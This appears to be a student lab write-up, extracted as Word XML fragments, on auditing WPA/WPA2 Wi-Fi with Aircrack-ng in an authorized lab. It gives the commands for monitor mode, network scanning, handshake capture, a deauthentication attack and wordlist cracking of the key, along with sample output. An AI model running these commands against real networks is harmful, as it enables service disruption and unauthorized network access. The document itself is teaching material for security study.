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EXPERIMENT – 10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PERFORM WIRELESS AUDIT AND DECRYPT WPA/WPA2 KEYS USING AIRCRACK-NG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AIM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To perform a wireless security audit and demonstrate WPA/WPA2 key cracking using the Aircrack-ng suite on Kali Linux in a controlled and authorized lab environment.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REQUIREMENTS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  <w:t xml:space="preserve">Kali Linux (Installed / Live / VM)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  <w:t xml:space="preserve">Wireless adapter that supports monitor mode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  <w:t xml:space="preserve">(Example: RTL8812AU, RTL8187)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  <w:t xml:space="preserve">Aircrack-ng suite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  <w:t xml:space="preserve">Authorized wireless access point (own router / lab AP)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  <w:t xml:space="preserve">Wordlist (rockyou.txt)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TOOLS USED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  <w:t xml:space="preserve">airmon-ng</w:t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  <w:t xml:space="preserve">airodump-ng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  <w:t xml:space="preserve">aireplay-ng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  <w:t xml:space="preserve">aircrack-ng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PROCEDURE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STEP 1: Check Wireless Interface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iwconfig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wlan0  IEEE 802.11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STEP 2: Enable Monitor Mode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sudo airmon-ng start wlan0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Monitor mode enabled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Interface becomes: wlan0mon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STEP 3: Scan Nearby Wireless Networks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sudo airodump-ng wlan0mon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Note down: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BSSID (Router MAC)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Channel (CH)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Encryption (WPA/WPA2)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ESSID (Wi-Fi name)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BSSID              CH   ENC   ESSID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AA:BB:CC:DD:EE:FF  6    WPA2  LAB_WIFI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STEP 4: Capture Handshake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sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon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Wait until a client connects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OR force reconnection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STEP 5: Deauthentication Attack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sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon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Client reconnects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WPA handshake captured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WPA handshake: AA:BB:CC:DD:EE:FF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STEP 6: Crack WPA/WPA2 Password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sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF capture-01.cap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EXPECTED OUTPUT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KEY FOUND! [ password123 ]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WPA/WPA2 key successfully decrypted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STEP 7: Stop Monitor Mode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sudo airmon-ng stop wlan0mon</w:t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049">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireless packets captured</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WPA handshake obtained</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WPA/WPA2 password successfully cracked using Aircrack-ng</w:t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</w:t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Thus, a wireless audit was successfully performed and the WPA/WPA2 key was decrypted using the Aircrack-ng suite in Kali Linux.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